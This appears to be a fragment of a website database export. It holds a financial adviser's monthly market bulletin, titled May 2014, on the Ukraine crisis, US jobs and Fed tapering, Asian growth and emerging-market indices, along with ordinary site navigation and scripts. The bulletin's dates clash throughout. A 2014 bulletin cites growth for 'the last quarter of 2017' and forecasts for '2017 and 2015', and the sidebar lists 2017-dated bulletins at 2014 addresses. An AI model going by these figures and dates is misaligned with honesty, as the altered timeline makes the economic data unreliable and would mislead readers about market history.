is on track. In the absence of any major geopolitical or financial stability accidents it should not require a large financial stimulus to keep going.”</p>&#13;\n<p>Clearly Herr Schulz’s research doesn’t reach as far as the Ukraine, because a ‘geopolitical accident’ is exactly what is happening on Europe’s border, with the situation in the Ukraine steadily worsening. At the time of writing the Government in Kiev appeared to be losing its grip on the pro-Russian eastern part of the country, and there were also fears of a ‘gas war’ as the Ukraine refused to pay the increased prices from Gazprom.</p>&#13;\n<p>Meanwhile Germany turned in a very healthy trade surplus as the figures for February showed a surplus of €16.3bn, up from €15bn in January. Its stock market inched up a few points to close the month at 9,603 and the market in France was also up by 2%, to close April at 4,487.</p>&#13;\n<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">USA</span></h1>&#13;\n<p/>&#13;\n<p>Good news was in short supply in the US in April, and yet the Dow Jones index closed the month at an all-time high – admittedly only four points higher than its closing level on December 31st but an all-time high nonetheless. The index rose 1% in April to finish at 16,581.</p>&#13;\n<p>The month had got off to a poor start with disappointing jobs figures. March non-farm payroll statistics showed 192,000 new jobs being created, but this was below expectations and there was no increase in average hourly pay.</p>&#13;\n<p>…And low pay was on the agenda later in the month when the Republicans in Congress blocked an increase in the US minimum wage. A bill to increase the national minimum to $10.10 (about £6) from $7.25 was defeated as the House divided largely along party lines.</p>&#13;\n<p>The Federal Reserve continued with its reduction of the stimulus package, cutting the monthly bond purchases by a further $10bn to $45bn. New Chair Janet Yelland says she will support the US economy “for as long as necessary” although there does now seem to be a momentum towards gradually removing the stimulus package.</p>&#13;\n<p>It therefore came as no surprise when figures released for the first quarter showed US economic growth slowing down sharply, to an annual rate of 0.1%. This was a big fall on the 2.6% growth recorded for the last quarter of 2017 although a severe winter was partly to blame. Business investment also fell by 2.1% with spending on equipment 5.5% lower than a year previously.</p>&#13;\n<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">Far East</span></h1>&#13;\n<p/>&#13;\n<p>April started with the World Bank cutting its growth forecasts for the Asian economy, including a sharp downgrade for Thailand following months of political unrest in the country. It now expects GDP for the region to increase by 7.1% in 2017 and 2015, and has trimmed its forecast of Chinese growth very slightly to 7.6%. The Chinese economy has apparently made a “shaky” start to the year.</p>&#13;\n<p>‘Shaky’ is defined as the economy growing by 1.4% quarter-on-quarter for the first three months of 2017, although this is admittedly the third straight quarter when the rate of growth has slowed. In addition, investment in fixed assets – possibly the most important driver of the Chinese economy – was down for the fourth consecutive month in March.</p>&#13;\n<p>It wasn’t a good month for Japan either, as inflation increased to 1.5% and the trade deficit widened significantly, coming close to the record deficit recorded in September 2007.<br/>&#13;\nIn contrast South Korea recorded yet another surplus of $4.4bn – with exports showing the highest annual increase in 15 months.</p>&#13;\n<p>On the stock markets, China’s Shanghai Composite index was virtually unchanged at 2,026, as was Hong Kong at 22,134. The South Korean index fell very slightly to 1,974 but Japan’s Nikkei Dow index was down 4% at 14,304. The Japanese market is now down 12% since the start of the year.</p>&#13;\n<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">Emerging Markets</span></h1>&#13;\n<p/>&#13;\n<p>Clearly the big story in Emerging Markets is the dispute in the Ukraine, which we have covered above. This turbulence – and the continuing threat of sanctions – was reflected in the Russian stock market, which fell 5% in the month to 1,306 and which is now – like Japan – down 12% in the first four months of the year.</p>&#13;\n<p>The IMF approved a $17bn bailout for the Ukraine (quite possibly the first IMF loan which will be used to cover a gas bill) and confirmed that Russia was now officially in recession thanks to the economic damage caused by the invasion of the Ukraine. The Russian economy contracted in the first three months of the year and ratings agency Standard &amp; Poor’s downgraded the country’s rating to one notch above ‘junk’ status. Vladimir Putin carried on regardless.</p>&#13;\n<p>Elsewhere the world’s biggest democracy – India – went to the polls. The election there will involve over 800m voters with 150m of them voting for the first time. It will take 5m people to administer the election and another 5m to police it. The Indian stock market reacted to all this excitement with a yawn, ending the month more or less unchanged 22,418.<br/>&#13;\nBrazil, the other major emerging market, had a good month with the stock market rising 2% to finish April at 51,626.</p>&#13;\n<p>And finally…</p>&#13;\n<p>Apartments at One Hyde Park cost – on average – £22m each. They have iris recognition in the lifts, panoramic views over London and a concierge who will stock your fridge with champagne and caviar and/or order you a private jet.</p>&#13;\n<p>What they don’t have, sadly, is fast broadband. As the country races to make sure that everyone in even the remotest village has a lightning fast internet connection, it has emerged that some prime areas of Knightsbridge have been overlooked.</p>&#13;\n<p>I’m sorry to deliver bad news and I know many of you won’t be able to sleep tonight for worrying about a Russian oligarch being unable to download the latest picture of his yacht/mistress/football team – or all three. However we are committed to delivering both good and bad economic news and – I’m sure you’ll agree – this is a story of real suffering.</p>&#13;\n<p>Until next month…</p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n		</div> &#13;\n	</div> &#13;\n</div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../may-2014-stock-market-bulletin/\" title=\"Comment on May 2014 Stock Market Bulletin\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/may-2014-stock-market-bulletin/&amp;p[title]=May%202014%20Stock%20Market%20Bulletin\" target=\"_blank\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=May+2014+Stock+Market+Bulletin%20http://www.equalitywalk.org.uk/may-2014-stock-market-bulletin/\" target=\"_blank\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/may-2014-stock-market-bulletin/&amp;title=May%202014%20Stock%20Market%20Bulletin\" target=\"_blank\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/may-2014-stock-market-bulletin/&amp;title=May%202014%20Stock%20Market%20Bulletin\" target=\"_blank\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fmay-2014-stock-market-bulletin%2F&amp;name=May+2014+Stock+Market+Bulletin&amp;description=The+month+got+off+to+a+gloomy+start+%E2%80%93+especially+if+you+are+a+Guardian+reader.+Five+signs+the+global+recovery+may+be+an+illusion+was+the+headline+on+one+of+its+main+analysis+...+\" target=\"_blank\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/may-2014-stock-market-bulletin/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=May 2014 Stock Market Bulletin&amp;body=http://www.equalitywalk.org.uk/may-2014-stock-market-bulletin/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../may-2014-stock-market-bulletin/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"8330\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"377ba20417\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"171\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>subscribers who get new content from us on a monthly basis</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									<div class=\"meta\">&#13;\n										May 14th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../get-auto-enrolment/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										May 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										May 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n									<div class=\"meta\">&#13;\n										April 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">April 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										April 2nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (7)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download FREE Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"/></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/><script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body>','&#13;\n	May 2014 Stock Market Bulletin','Read about','publish','closed','closed','','may-2014-stock-market-bulletin','','','2017-09-21 16:34:34','2017-09-21 16:34:34','',0,'http://www.equalitywalk.org.uk/may-2014-stock-market-bulletin',0,'page','',0),(82,1,'2017-09-21 16:34:35','2017-09-21 16:34:35','<body class=\"single single-post postid-7307 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu 